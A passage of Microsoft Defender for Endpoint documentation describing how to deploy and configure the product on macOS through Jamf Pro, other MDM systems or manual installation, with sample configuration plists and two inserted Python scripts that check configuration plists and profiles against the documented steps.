3. Select Download onboarding package
(WindowsDefenderATPOnboardingPackage.zip).

4. Extract WindowsDefenderATPOnboardingPackage.zip .

5. Copy the file to your preferred location. For example,
C:\Users\JaneDoe_or_JohnDoe.contoso\Downloads\WindowsDefenderATPOnboardingPackage_macOS_MDM_contoso\jamf\WindowsDefenderATPOnboarding.plist .

Step 2: Create a configuration profile in Jamf Pro using the onboarding package
1. Locate the file WindowsDefenderATPOnboarding.plist from the previous section.

2. Sign in to Jamf Pro, navigate to Computers > Configuration Profiles, and select
New.

3. Enter the following details in the General tab:

Name: MDE onboarding for macOS
Description: MDE EDR onboarding for macOS
Category: None
Distribution Method: Install Automatically
Level: Computer Level

4. Navigate to the Application & Custom Settings page and select Upload > Add.

5. Select Upload File (PLIST file) then in Preference Domain enter:
com.microsoft.wdav.atp .

6. Select Open and select the onboarding file.

7. Select Upload.

8. Select the Scope tab.

9. Select the target computers.

10. Select Save.

11. Select Done.


Step 3: Configure Microsoft Defender for Endpoint settings
You can either use JAMF Pro GUI to edit individual settings of the Microsoft Defender for
Endpoint configuration, or use the legacy method by creating a configuration Plist in a
text editor, and uploading it to JAMF Pro.

Note that you must use exactly com.microsoft.wdav as the Preference Domain: Microsoft
Defender for Endpoint loads its managed settings only from this name and from
com.microsoft.wdav.ext.

(The com.microsoft.wdav.ext version may be used in rare cases when you prefer to use the
GUI method, but also need to configure a setting that has not been added to the
schema yet.)

GUI method
1. Download schema.json file from Defender's GitHub repository and save it to a
local file:

Bash

curl -o ~/Documents/schema.json https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/schema/schema.json

2. Create a new Configuration Profile under Computers -> Configuration Profiles,
enter the following details on the General tab:

Name: MDATP MDAV configuration settings
Description: <blank>
Category: None (default)
Level: Computer Level (default)
Distribution Method: Install Automatically (default)

3. Scroll down to the Application & Custom Settings tab, select External
Applications, click Add and use Custom Schema as Source to use for the
preference domain.

4. Enter com.microsoft.wdav as the Preference Domain, select Add Schema and
Upload the schema.json file downloaded on Step 1. Click Save.

5. You can see all supported Microsoft Defender for Endpoint configuration settings
below, under Preference Domain Properties. Click Add/Remove properties to
select the settings that you want to be managed, and click Ok to save your
changes. (Settings left unselected will not be included into the managed
configuration, an end user will be able to configure those settings on their
machines.)

6. Change values of the settings to desired values. You can click More information to
get documentation for a particular setting. (You may click Plist preview to inspect
what the configuration plist will look like. Click Form editor to return to the visual
editor.)

7. Select the Scope tab.


8. Select Contoso's Machine Group.

9. Select Add, then select Save.

10. Select Done. You'll see the new Configuration profile.


Microsoft Defender for Endpoint adds new settings over time. These new settings will be
added to the schema, and a new version will be published to GitHub. All you need to do
to have updates is to download an updated schema, edit existing configuration profile,
and Edit schema at the Application & Custom Settings tab.

Legacy method

1. Use the following Microsoft Defender for Endpoint configuration settings:

enableRealTimeProtection
passiveMode

Note

Not turned on by default. If you are planning to run a third-party AV on
macOS, set it to true.

exclusions
excludedPath
excludedFileExtension
excludedFileName
exclusionsMergePolicy
allowedThreats

Note

EICAR is in the sample. If you are going through a proof-of-concept, remove
it, especially if you are testing with EICAR.

disallowedThreatActions
potentially_unwanted_application
archive_bomb
cloudService
automaticSampleSubmission
tags
hideStatusMenuIcon

For information, see Property list for JAMF full configuration profile.

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>antivirusEngine</key>
<dict>
<key>enableRealTimeProtection</key>
<true/>
<key>passiveMode</key>
<false/>
<key>exclusions</key>
<array>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<false/>
<key>path</key>
<string>/var/log/system.log</string>
</dict>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<true/>
<key>path</key>
<string>/home</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileExtension</string>
<key>extension</key>
<string>pdf</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileName</string>
<key>name</key>
<string>cat</string>
</dict>
</array>
<key>exclusionsMergePolicy</key>
<string>merge</string>
<key>allowedThreats</key>
<array>
<string>EICAR-Test-File (not a virus)</string>
</array>
<key>disallowedThreatActions</key>
<array>
<string>allow</string>
<string>restore</string>
</array>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
<key>threatTypeSettingsMergePolicy</key>
<string>merge</string>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>diagnosticLevel</key>
<string>optional</string>
<key>automaticSampleSubmission</key>
<true/>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<string>GROUP</string>
<key>value</key>
<string>ExampleTag</string>
</dict>
</array>
</dict>
<key>userInterface</key>
<dict>
<key>hideStatusMenuIcon</key>
<false/>
</dict>
</dict>
</plist>

2. Save the file as MDATP_MDAV_configuration_settings.plist.

3. In the Jamf Pro dashboard, open Computers > Configuration Profiles.
Click New and switch to the General tab.

4. Enter the following details on the General tab:

Name: MDATP MDAV configuration settings
Description: <blank>
Category: None (default)
Distribution Method: Install Automatically (default)
Level: Computer Level (default)

5. In Application & Custom Settings, select Configure.

6. Select Upload File (PLIST file).

7. In Preferences Domain, enter com.microsoft.wdav, then select Upload PLIST File.

8. Select Choose File.

9. Select the MDATP_MDAV_configuration_settings.plist, then select Open.

10. Select Upload.

Note

If you happen to upload the Intune file, you'll get the following error:

11. Select Save.

12. The file is uploaded.

13. Select the Scope tab.

14. Select Contoso's Machine Group.

15. Select Add, then select Save.

16. Select Done. You'll see the new Configuration profile.
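As an added check (not part of this article or of the Defender project), the following Python script lints a legacy-method configuration plist before you upload it to JAMF Pro: it verifies the antivirusEngine keys the steps above rely on, checks that each exclusion carries the fields its $type needs, and flags the EICAR entry the Note warns about. The sample plist is a constructed, trimmed copy of the one above; the admin_only merge-policy value is assumed from the product documentation rather than taken from this page.

```python
import plistlib
from typing import Any
from xml.parsers.expat import ExpatError

# Constructed sample: a trimmed copy of the legacy-method plist above, including
# the EICAR entry that the Note warns about.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>antivirusEngine</key>
  <dict>
    <key>enableRealTimeProtection</key><true/>
    <key>passiveMode</key><false/>
    <key>exclusions</key>
    <array>
      <dict><key>$type</key><string>excludedPath</string>
            <key>isDirectory</key><true/><key>path</key><string>/home</string></dict>
      <dict><key>$type</key><string>excludedFileExtension</string>
            <key>extension</key><string>pdf</string></dict>
    </array>
    <key>exclusionsMergePolicy</key><string>merge</string>
    <key>allowedThreats</key>
    <array><string>EICAR-Test-File (not a virus)</string></array>
    <key>disallowedThreatActions</key>
    <array><string>allow</string><string>restore</string></array>
  </dict>
  <key>cloudService</key>
  <dict><key>enabled</key><true/><key>automaticSampleSubmission</key><true/></dict>
</dict>
</plist>
"""

# Fields each exclusion $type must carry, as used in the plist above.
EXCLUSION_FIELDS = {
    "excludedPath": {"path", "isDirectory"},
    "excludedFileExtension": {"extension"},
    "excludedFileName": {"name"},
}
# "merge" is the value shown on this page; "admin_only" is assumed from the product docs.
MERGE_POLICIES = {"merge", "admin_only"}


def lint_mdav_config(plist_bytes: bytes, expect_passive: bool = False) -> list[str]:
    """Return findings for a managed-settings plist; an empty list means it matches
    what the legacy-method steps expect (expect_passive=True for third-party AV)."""
    try:
        cfg: dict[str, Any] = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError) as exc:
        return [f"not a valid plist: {exc}"]
    av = cfg.get("antivirusEngine")
    if not isinstance(av, dict):
        return ["missing antivirusEngine dictionary"]
    findings: list[str] = []
    if av.get("enableRealTimeProtection") is not True:
        findings.append("enableRealTimeProtection is not true")
    passive = av.get("passiveMode")
    if not isinstance(passive, bool):
        findings.append("passiveMode must be a boolean")
    elif passive != expect_passive:
        findings.append(f"passiveMode is {passive}; expected {expect_passive}")
    for i, ex in enumerate(av.get("exclusions", [])):
        kind = ex.get("$type")
        need = EXCLUSION_FIELDS.get(kind)
        if need is None:
            findings.append(f"exclusion {i}: unknown $type {kind!r}")
        elif not need.issubset(ex):
            findings.append(f"exclusion {i}: missing {sorted(need - set(ex))}")
    if av.get("exclusionsMergePolicy") not in MERGE_POLICIES:
        findings.append("exclusionsMergePolicy must be one of " + ", ".join(sorted(MERGE_POLICIES)))
    for threat in av.get("allowedThreats", []):
        if "EICAR" in str(threat).upper():
            findings.append(f"allowedThreats contains {threat!r}; remove it before testing with EICAR")
    if "allow" not in av.get("disallowedThreatActions", []):
        findings.append("disallowedThreatActions does not include 'allow', so end users can allow threats")
    return findings
```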


Step 4: Configure notifications settings

These steps are applicable on macOS 11 (Big Sur) or later.

1. In the Jamf Pro dashboard, select Computers, then Configuration Profiles.

2. Click New, and enter the following details in the General tab for Options:

Name: MDATP MDAV Notification settings
Description: macOS 11 (Big Sur) or later
Category: None (default)
Distribution Method: Install Automatically (default)
Level: Computer Level (default)

On the Notifications tab, click Add, and enter the following values:

Bundle ID: com.microsoft.wdav.tray
Critical Alerts: Click Disable
Notifications: Click Enable
Banner alert type: Select Include and Temporary (default)
Notifications on lock screen: Click Hide
Notifications in Notification Center: Click Display
Badge app icon: Click Display

On the Notifications tab, click Add one more time, scroll down to New Notifications
Settings, and enter:

Bundle ID: com.microsoft.autoupdate.fba
Configure the rest of the settings to the same values as above.

You now have two 'tables' with notification configurations, one for
Bundle ID com.microsoft.wdav.tray and another for Bundle ID
com.microsoft.autoupdate.fba. While you can configure alert settings per
your requirements, the Bundle IDs must be exactly as described above,
and the Include switch must be On for Notifications.

3. Select the Scope tab, then select Add.

4. Select Contoso's Machine Group.

5. Select Add, then select Save.

6. Select Done. You'll see the new Configuration profile.


Step 5: Configure Microsoft AutoUpdate (MAU)

1. Use the following Microsoft Defender for Endpoint configuration settings:

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ChannelName</key>
<string>Current</string>
<key>HowToCheck</key>
<string>AutomaticDownload</string>
<key>EnableCheckForUpdatesButton</key>
<true/>
<key>DisableInsiderCheckbox</key>
<false/>
<key>SendAllTelemetryEnabled</key>
<true/>
</dict>
</plist>

2. Save it as MDATP_MDAV_MAU_settings.plist.

3. In the Jamf Pro dashboard, select General.

4. Enter the following details on the General tab:

Name: MDATP MDAV MAU settings
Description: Microsoft AutoUpdate settings for MDATP for macOS
Category: None (default)
Distribution Method: Install Automatically (default)
Level: Computer Level (default)

5. In Application & Custom Settings, select Configure.

6. Select Upload File (PLIST file).

7. In Preference Domain enter com.microsoft.autoupdate2, then select Upload PLIST File.

8. Select Choose File.

9. Select MDATP_MDAV_MAU_settings.plist.

10. Select Upload.

11. Select Save.

12. Select the Scope tab.

13. Select Add.

14. Select Done.

Step 6: Grant full disk access to Microsoft Defender for Endpoint

1. In the Jamf Pro dashboard, select Configuration Profiles.

2. Select + New.

3. Enter the following details on the General tab:

Name: MDATP MDAV - grant Full Disk Access to EDR and AV
Description: On macOS 11 (Big Sur) or later, the new Privacy Preferences Policy Control
Category: None
Distribution method: Install Automatically
Level: Computer level

4. In Configure Privacy Preferences Policy Control, select Configure.

5. In Privacy Preferences Policy Control, enter the following details:

Identifier: com.microsoft.wdav
Identifier Type: Bundle ID
Code Requirement: identifier "com.microsoft.wdav" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9

6. Select + Add.

Under App or service: Set to SystemPolicyAllFiles

Under "access": Set to Allow

7. Select Save (not the one at the bottom right).

8. Click the + sign next to App Access to add a new entry.

9. Enter the following details:

Identifier: com.microsoft.wdav.epsext
Identifier Type: Bundle ID
Code Requirement: identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9

10. Select + Add.

Under App or service: Set to SystemPolicyAllFiles

Under "access": Set to Allow

11. Select Save (not the one at the bottom right).

12. Select the Scope tab.

13. Select + Add.

14. Select Computer Groups > under Group Name > select Contoso's MachineGroup.

15. Select Add.

16. Select Save.

17. Select Done.

Alternatively, you can download fulldisk.mobileconfig and upload it to JAMF
Configuration Profiles as described in Deploying Custom Configuration Profiles using
Jamf Pro | Method 2: Upload a Configuration Profile to Jamf Pro.

Step 7: Approve System extensions for Microsoft Defender for Endpoint

1. In the Configuration Profiles, select + New.

2. Enter the following details on the General tab:

Name: MDATP MDAV System Extensions
Description: MDATP system extensions
Category: None
Distribution Method: Install Automatically
Level: Computer Level

3. In System Extensions, select Configure.

4. In System Extensions, enter the following details:

Display Name: Microsoft Corp. System Extensions
System Extension Types: Allowed System Extensions
Team Identifier: UBF8T346G9
Allowed System Extensions:
com.microsoft.wdav.epsext
com.microsoft.wdav.netext

5. Select the Scope tab.

6. Select + Add.

7. Select Computer Groups > under Group Name > select Contoso's Machine Group.

8. Select + Add.

9. Select Save.

10. Select Done.
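As an added example (not code from this article, nor Microsoft's fulldisk.mobileconfig), the following Python script audits an exported configuration profile against Steps 6 and 7: every SystemPolicyAllFiles grant must use a Bundle ID identifier, Allow access, and the exact code requirement string shown above, and both system extensions must be allowed under team UBF8T346G9. The payload keys follow Apple's com.apple.TCC.configuration-profile-policy and com.apple.system-extension-policy payload formats; the sample profile and its PayloadIdentifier values are constructed inline.

```python
import plistlib
from typing import Any

TEAM_ID = "UBF8T346G9"
# Bundle IDs that Step 6 grants Full Disk Access (SystemPolicyAllFiles) to.
REQUIRED_FDA = {"com.microsoft.wdav", "com.microsoft.wdav.epsext"}
# System extensions that Step 7 allows under the Microsoft team identifier.
REQUIRED_SYSEXT = {"com.microsoft.wdav.epsext", "com.microsoft.wdav.netext"}
TCC_PAYLOAD = "com.apple.TCC.configuration-profile-policy"
SYSEXT_PAYLOAD = "com.apple.system-extension-policy"


def code_requirement(bundle_id: str) -> str:
    """The designated requirement string used for every identifier in Steps 6-8."""
    return (
        f'identifier "{bundle_id}" and anchor apple generic and '
        "certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and "
        "certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and "
        f"certificate leaf[subject.OU] = {TEAM_ID}"
    )


def build_profile(fda_ids: set[str], sysext_ids: set[str], allow: bool = True) -> bytes:
    """Build a constructed profile (not Microsoft's fulldisk.mobileconfig) with one
    PPPC payload and one system-extension payload; used for the sample and tests."""
    grants = [
        {
            "Identifier": bundle_id,
            "IdentifierType": "bundleID",
            "CodeRequirement": code_requirement(bundle_id),
            "Allowed": allow,
        }
        for bundle_id in sorted(fda_ids)
    ]
    return plistlib.dumps({
        "PayloadType": "Configuration",
        "PayloadIdentifier": "example.mdav.profile",  # constructed identifier
        "PayloadContent": [
            {
                "PayloadType": TCC_PAYLOAD,
                "PayloadIdentifier": "example.mdav.tcc",  # constructed identifier
                "Services": {"SystemPolicyAllFiles": grants},
            },
            {
                "PayloadType": SYSEXT_PAYLOAD,
                "PayloadIdentifier": "example.mdav.sysext",  # constructed identifier
                "AllowedSystemExtensions": {TEAM_ID: sorted(sysext_ids)},
            },
        ],
    })


SAMPLE_PROFILE = build_profile(REQUIRED_FDA, REQUIRED_SYSEXT)


def audit_profile(profile_bytes: bytes) -> list[str]:
    """Return findings; an empty list means the profile satisfies Steps 6 and 7."""
    findings: list[str] = []
    profile: dict[str, Any] = plistlib.loads(profile_bytes)
    fda_granted: set[str] = set()
    sysext_allowed: set[str] = set()
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType")
        if ptype == TCC_PAYLOAD:
            for entry in payload.get("Services", {}).get("SystemPolicyAllFiles", []):
                ident = entry.get("Identifier", "")
                if entry.get("IdentifierType") != "bundleID":
                    findings.append(f"{ident}: Identifier Type must be Bundle ID")
                elif not (entry.get("Allowed") is True or entry.get("Authorization") == "Allow"):
                    # macOS 11+ profiles may carry Authorization instead of Allowed.
                    findings.append(f"{ident}: access is not set to Allow")
                elif entry.get("CodeRequirement") != code_requirement(ident):
                    findings.append(f"{ident}: Code Requirement differs from the documented string")
                else:
                    fda_granted.add(ident)
        elif ptype == SYSEXT_PAYLOAD:
            sysext_allowed.update(payload.get("AllowedSystemExtensions", {}).get(TEAM_ID, []))
    for missing in sorted(REQUIRED_FDA - fda_granted):
        findings.append(f"{missing}: no Full Disk Access grant")
    for missing in sorted(REQUIRED_SYSEXT - sysext_allowed):
        findings.append(f"{missing}: not in Allowed System Extensions")
    return findings
```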


Step 8: Configure Network Extension

As part of the Endpoint Detection and Response capabilities, Microsoft Defender for
Endpoint on macOS inspects socket traffic and reports this information to the Microsoft
Defender portal. The following policy allows the network extension to perform this
function.

These steps are applicable on macOS 11 (Big Sur) or later.

1. In the Jamf Pro dashboard, select Computers, then Configuration Profiles.

2. Click New, and enter the following details for Options:

Tab General:
Name: Microsoft Defender Network Extension
Description: macOS 11 (Big Sur) or later
Category: None (default)
Distribution Method: Install Automatically (default)
Level: Computer Level (default)

Tab Content Filter:
Filter Name: Microsoft Defender Content Filter
Identifier: com.microsoft.wdav
Leave Service Address, Organization, User Name, Password, Certificate blank (Include is not selected)
Filter Order: Inspector
Socket Filter: com.microsoft.wdav.netext
Socket Filter Designated Requirement: identifier "com.microsoft.wdav.netext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9
Leave Network Filter fields blank (Include is not selected)

Identifier, Socket Filter, and Socket Filter Designated Requirement must have
exactly the values specified above.

3. Select the Scope tab.

4. Select + Add.

5. Select Computer Groups > under Group Name > select Contoso's Machine Group.

6. Select + Add.

7. Select Save.

8. Select Done.

Alternatively, you can download netfilter.mobileconfig and upload it to JAMF
Configuration Profiles as described in Deploying Custom Configuration Profiles using
Jamf Pro | Method 2: Upload a Configuration Profile to Jamf Pro.

Step 9: Configure Background Services

Caution

macOS 13 (Ventura) contains new privacy enhancements. Beginning with this
version, by default, applications cannot run in the background without explicit consent.
Microsoft Defender for Endpoint must run its daemon process in the background.
This configuration profile grants Background Service permissions to Microsoft
Defender for Endpoint. If you previously configured Microsoft Defender for
Endpoint through JAMF, we recommend you update the deployment with this
configuration profile.

Download background_services.mobileconfig from our GitHub repository.

Upload the downloaded mobileconfig to JAMF Configuration Profiles as described in
Deploying Custom Configuration Profiles using Jamf Pro | Method 2: Upload a
Configuration Profile to Jamf Pro.

Step 10: Schedule scans with Microsoft Defender for Endpoint on macOS

Follow the instructions on Schedule scans with Microsoft Defender for Endpoint on
macOS.

Step 11: Deploy Microsoft Defender for Endpoint on macOS

Note

In the steps that follow, the name of the .pkg file and the Display Name values are
examples. In these examples, 200329 represents the date on which the package and
policy were created (in yymmdd format), and v100.86.92 represents the version of
the Microsoft Defender application that is being deployed. These values should be
updated to conform with the naming convention you use in your environment for
Packages and Policies.

1. Navigate to where you saved wdav.pkg.

2. Rename it to wdav_MDM_Contoso_200329.pkg.

3. Open the Jamf Pro dashboard.

4. Select your computer and click the gear icon at the top, then select Computer
Management.

5. In Packages, select + New.

6. In the General tab, enter the following details in New Package:

Display Name: Leave it blank for now; it is reset when you choose your pkg.
Category: None (default)
Filename: Choose File

Open the file and point it to wdav.pkg or wdav_MDM_Contoso_200329.pkg.

7. Select Open. Set the Display Name to Microsoft Defender Advanced Threat
Protection and Microsoft Defender Antivirus.

Manifest File is not required. Microsoft Defender for Endpoint works without a
Manifest File.

Options tab: Keep default values.

Limitations tab: Keep default values.

8. Select Save. The package is uploaded to Jamf Pro.

It can take a few minutes for the package to be available for deployment.

9. Navigate to the Policies page.

10. Select + New to create a new policy.

11. In General, enter the Display name MDATP Onboarding Contoso 200329
v100.86.92 or later.

12. Select Recurring Check-in.

13. Select Save.

14. Select Packages > Configure.

15. Select the Add button next to Microsoft Defender Advanced Threat Protection
and Microsoft Defender Antivirus.

16. Select Save.

17. Create a smart group for machines with Microsoft Defender profiles.

For the best user experience, configuration profiles must be installed on enrolled
machines before Microsoft Defender's package. In most cases Jamf Pro pushes
configuration profiles immediately, whereas policies are executed after some time
(for example, during check-in).

However, in some cases configuration profile deployment can be delayed
significantly (for example, if a user's machine is locked).

Jamf Pro provides a way to ensure the correct order. You can create a smart group
for machines that already received Microsoft Defender's configuration profile, and
install Microsoft Defender's package only on those machines (and as soon as they
receive this profile).

To do so, create a smart group first. In a new browser window, open Smart
Computer Groups from the left menu and click New. Assign a name, switch to
the Criteria tab, click Add, and then click Show Advanced Criteria.

Select Profile Name as a criterion, and use the name of a previously created
configuration profile as the Value.

Click Save. Return to the window where you are configuring the package policy.

18. Select the Scope tab.

19. Select the target computers.

Under Scope, select Add.

Switch to the Computer Groups tab. Find the smart group you created, and Add it.

Select Self-Service if you want users to install Microsoft Defender voluntarily, on
demand.

20. Select Done.

Configuration profile scope

JAMF requires you to define a set of machines for a configuration profile. You need to
make sure that all machines receiving Defender's package also receive all configuration
profiles listed above.

Warning

JAMF supports Smart Computer Groups, which allow deploying items such as configuration
profiles or policies to all machines matching certain criteria that are evaluated dynamically.
It is a powerful concept that is widely used for configuration profile distribution.

However, keep in mind that these criteria should not include the presence of Defender
on a machine. While using this criterion may sound logical, it creates problems that
are difficult to diagnose.

Defender relies on all these profiles at the moment of its installation. Making
configuration profiles depend on Defender's presence effectively delays
deployment of the configuration profiles, and results in an initially unhealthy product
and/or prompts for manual approval of certain application permissions that are
otherwise auto-approved by profiles.

Deploying a policy with Microsoft Defender's package after deploying configuration
profiles ensures the end user's best experience, because all required configurations will
be applied before the package installs.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Enroll Microsoft Defender for Endpoint on macOS devices into Jamf Pro
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Enroll macOS devices

There are multiple methods of enrolling devices in Jamf.

This article will guide you through two methods:

Method 1: Enrollment Invitations
Method 2: Prestage Enrollments

For a complete list, see About Computer Enrollment.

Enrollment Method 1: Enrollment Invitations

1. In the Jamf Pro dashboard, navigate to Enrollment invitations.

2. Select + New.

3. In Specify Recipients for the Invitation > under Email Addresses, enter the e-mail
address(es) of the recipients.

For example: janedoe@contoso.com

4. Configure the message for the invitation.

Enrollment Method 2: Prestage Enrollments

1. In the Jamf Pro dashboard, navigate to Prestage enrollments.

2. Follow the instructions in Computer PreStage Enrollments.

Enroll macOS device

1. Select Continue and install the CA certificate from a System Preferences window.

2. Once the CA certificate is installed, return to the browser window and select Continue
to install the MDM profile.

3. Select Allow to allow downloads from JAMF.

4. Select Continue to proceed with the MDM Profile installation.

5. Select Continue to install the MDM Profile.

6. Select Continue to complete the configuration.


 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Deployment with a different Mobile Device Management (MDM) system for Microsoft Defender for Endpoint on macOS
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Prerequisites and system requirements

Before you get started, see the main Microsoft Defender for Endpoint on macOS page
for a description of prerequisites and system requirements for the current software
version.

Approach

Caution

Currently, Microsoft officially supports only Intune and JAMF for the deployment
and management of Microsoft Defender for Endpoint on macOS. Microsoft makes
no warranties, express or implied, with respect to the information provided below.

If your organization uses a Mobile Device Management (MDM) solution that isn't
officially supported, this doesn't mean you're unable to deploy or run Microsoft
Defender for Endpoint on macOS.

Microsoft Defender for Endpoint on macOS doesn't depend on any vendor-specific
features. It can be used with any MDM solution that supports the following features:

Deploy a macOS .pkg to managed devices.
Deploy macOS system configuration profiles to managed devices.
Run an arbitrary admin-configured tool/script on managed devices.

Most modern MDM solutions include these features, although they may use different
names for them.

You can deploy Defender for Endpoint without the last requirement from the preceding
list; however:

You won't be able to collect status in a centralized way.
If you decide to uninstall Defender for Endpoint, you'll need to log on to the client
device locally as an administrator.

Deployment

Most MDM solutions use the same model for managing macOS devices, with similar
terminology. Use the JAMF-based deployment as a template.

Package

Configure deployment of a required application package, with the installation package
(wdav.pkg) downloaded from the Microsoft Defender portal.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

To deploy the package to your enterprise, use the instructions associated with
your MDM solution.

License settings

Set up a system configuration profile.

Your MDM solution may call it something like "Custom Settings Profile", as Microsoft
Defender for Endpoint on macOS isn't part of macOS.

Use the property list, jamf/WindowsDefenderATPOnboarding.plist, which can be
extracted from an onboarding package downloaded from the Microsoft Defender portal.
Your system may support an arbitrary property list in XML format. You can upload the
jamf/WindowsDefenderATPOnboarding.plist file as-is in that case. Alternatively, it may
require you to convert the property list to a different format first.

Typically, your custom profile has an ID, name, or domain attribute. You must use exactly
"com.microsoft.wdav.atp" for this value. The MDM uses it to deploy the settings file to
/Library/Managed Preferences/com.microsoft.wdav.atp.plist on a client device, and
Defender for Endpoint reads this file to load the onboarding information.

System configuration profiles

macOS requires that a user manually and explicitly approves certain functions that an
application uses, for example system extensions, running in the background, sending
notifications, full disk access, etc. Microsoft Defender for Endpoint relies on these
functions, and can't function properly until all these consents are received from a user.

To grant consent automatically on a user's behalf, an administrator pushes system
policies through their MDM system. We strongly recommend doing this instead
of relying on manual approvals from end users.

We supply all policies that Microsoft Defender for Endpoint requires as mobileconfig
files available at https://github.com/microsoft/mdatp-xplat. Mobileconfig is
Apple's import/export format, which Apple Configurator and other products like iMazing
Profile Editor support.

Most MDM vendors support importing a mobileconfig file to create a new custom
configuration profile.

To set up profiles:

1. Find out how a mobileconfig import is done with your MDM vendor.
2. For all profiles from https://github.com/microsoft/mdatp-xplat, download the
mobileconfig file and import it.
3. Assign the proper scope for each created configuration profile.

Apple regularly creates new types of payloads with new versions of the OS. You'll
have to visit the page mentioned above and publish new profiles once they become
available. We post notifications to our What's New page once we make changes like
that.

Check installation status

Run Microsoft Defender for Endpoint on a client device to check the onboarding status.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Manual deployment for Microsoft Defender for Endpoint on macOS
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This article describes how to deploy Microsoft Defender for Endpoint on macOS
manually. A successful deployment requires the completion of all of the following steps:

Download installation and onboarding packages
Application installation (macOS 11 and newer versions)
Onboarding Package
Grant Full Disk Access
Ensure Background Execution

Prerequisites and system requirements

Before you get started, see the main Microsoft Defender for Endpoint on macOS page
for a description of prerequisites and system requirements for the current software
version.

Download installation and onboarding packages

Download the installation and onboarding packages from the Microsoft Defender portal.

Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

1. In the Microsoft Defender portal, go to Settings > Endpoints > Device
management > Onboarding.

2. In Section 1 of the page, set the operating system to macOS and the Deployment method
to Local script.

3. In Section 2 of the page, select Download installation package. Save it as
wdav.pkg to a local directory.

4. In Section 2 of the page, select Download onboarding package. Save it as
WindowsDefenderATPOnboardingPackage.zip to the same directory.

5. From a command prompt, verify that you have the two files.

Type cd Downloads and press Enter.

Type ls and press Enter.

6. Copy wdav.pkg and MicrosoftDefenderATPOnboardingMacOs.sh to the device
where you want to deploy Microsoft Defender for Endpoint on macOS.

Application installation (macOS 11 and newer versions)

To complete this process, you must have admin privileges on the device.

1. Do one of the following steps:

Navigate to the downloaded wdav.pkg in Finder and open it.

Or

Install wdav.pkg from Terminal:

Console

sudo installer -store -pkg /Users/admin/Downloads/wdav.pkg -target /

2. Select Continue.

3. Read through the Software License Agreement and select Continue to agree with
the terms.

4. Read through the End-User License Agreement (EULA) and select Agree.

5. From Destination Select, select the disk where you want to install the Microsoft
Defender Software, for example, Macintosh HD, and select Continue.

Note

The amount of disk space required for installation is around 777 MB.

6. To change the installation destination, select Change Install Location....

7. Click Install.

8. Enter the password when prompted.

9. Click Install Software.

10. At the end of the installation process, on macOS Big Sur (11.0) or later,
you're prompted to approve the system extensions used by the product. Select
Open Security Preferences.

11. To enable the system extension, select Details.

12. From the Security & Privacy window, select the checkboxes next to Microsoft
Defender and select OK.

13. Repeat steps 11 and 12 for all system extensions distributed with Microsoft
Defender for Endpoint on Mac.

14. As part of the Endpoint Detection and Response capabilities, Microsoft Defender
for Endpoint on Mac inspects socket traffic and reports this information to the
Microsoft Defender portal. When prompted to grant Microsoft Defender for
Endpoint permissions to filter network traffic, select Allow.

To troubleshoot System Extension issues, see Troubleshoot System Extension.


Allow Full Disk Access

macOS Catalina (10.15) and newer versions require full disk access to be granted to
Microsoft Defender for Endpoint in order for it to protect and monitor the device.

Note

Granting full disk access to Microsoft Defender for Endpoint is a new requirement by
Apple for all third-party software that accesses files and folders containing personal data.

To grant full disk access:

